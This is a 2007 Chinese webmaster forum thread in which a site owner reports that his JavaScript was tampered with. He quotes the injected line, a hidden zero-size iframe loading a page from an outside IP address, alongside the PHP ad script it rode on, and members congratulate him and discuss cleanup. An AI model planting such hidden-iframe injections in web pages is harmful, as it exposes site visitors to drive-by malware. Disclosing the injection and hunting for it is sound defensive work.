webmasterz.cn的木马已经差不多被我搞定了 讲解一个停放EMU方法

静水流深

请大家再去帮我复查下，看还有没木马，另外前年的教程已经免费发布上去了，自己去下或者看。

挂马的人不是专业黑客，是搞这行的，把我的JS里加了个这个

document.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
<?php
require(dirname(__FILE__)."/../include/config_base.php");
$aid = ereg_replace("[^0-9]","",$aid);
$dsql = new DedeSql(false);
$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");
$dsql->Close();
if($row['timeset']==0) $adbody = $row['normbody'];
else{
$ntime = mytime();
if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }
else{ $adbody = $row['normbody']; }
}
$adbody = str_replace('"','\"',$adbody);
$adbody = str_replace("\r","\\r",$adbody);
$adbody = str_replace("\n","\\n",$adbody);
echo "<!--\r\n";
echo "document.write(\"{$adbody}\");\r\n";
echo "-->\r\n";
?>


自己看第一行 根据这个去找他到底想干什么吧 其实意图很明显的，一是玩计数器，二是做停放

LLC

国内的停放？

renjinhua01

嗯，不错，恭喜！

可乐加冰

静水老大厉害.

jerry

查到就好啦:cool:

在路上

这些人没意思晒。或许是眼红，

ommofans

老大还是反应很迅速的，一下就发现了，没有要我赚到2000论坛币

le19754

原帖由 ommofans 于 2007-10-30 10:24 发表
老大还是反应很迅速的，一下就发现了，没有要我赚到2000论坛币

: 以后得抓紧啦

龙少

恭喜发财

: 以后你放我报告。来赚币。

mcc514

怎么杀啊？我可能中了。但是杀毒 软件没报。

net007

厉害啊

萧枫叶

原帖由 mcc514 于 2007-10-30 14:36 发表
怎么杀啊？我可能中了。但是杀毒 软件没报。

上虚拟机.运行.监控情况,抓包分析.

nod32

不会是论坛里的人吧。

new168

肯定是个病毒撒

谷歌

原帖由 nod32 于 2007-10-30 18:59 发表
不会是论坛里的人吧。

肯定是了:

ddtme

看来有人想借东风:

winner01

大家好好学啊，按现在的会员数7000＋计算，希望哪天上论坛时能帮大家义务运行这7000＋个IFRAME， 前提是只要网页还打得开！:

kaixinde

有时放病毒，有时不放

taoq

严重软文AD...

velee

思路 啊
不错咯

woshilanse

哈哈~被人搞了就得承认-至少他比你专业

kongknet

网站有后门吧
我以前网站经常被放JS

zhengjun

老大真厉害

我高兴

把放木马的人送到法院去:

aza

什么世道  到处都是木马